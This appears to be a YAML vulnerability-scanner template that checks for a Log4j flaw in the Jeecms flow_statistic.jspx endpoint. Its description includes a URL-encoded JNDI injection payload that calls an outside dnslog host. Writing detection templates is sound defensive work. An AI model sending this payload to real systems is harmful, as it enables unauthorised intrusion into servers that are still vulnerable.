id: jeecms-flowstatistic-log4j

info:
  name: Jeecms Flow_statistic接口 log4j漏洞
  author: a16
  severity: high
  verified: true
  description: jeecms某接口存在log4j2反序列化，exp:/flow_statistic.jspx?referer=&page=%24%7Bjndi%3Adns%3A%2F%2Fxxxxx.dnslog.cn%2Ft%7D

rules:
  r0:
    request:
      method: GET
      path: /flow_statistic.jspx?referer=&page=
    expression: response.status == 200
expression: r0()